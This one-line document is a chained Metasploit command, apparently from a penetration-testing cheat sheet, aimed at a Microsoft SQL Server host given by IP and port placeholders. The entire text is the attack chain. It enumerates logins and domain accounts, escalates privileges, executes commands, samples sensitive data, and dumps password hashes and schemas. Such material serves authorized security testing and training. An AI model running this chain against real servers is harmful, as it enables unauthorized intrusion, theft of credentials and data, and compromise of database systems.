Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit'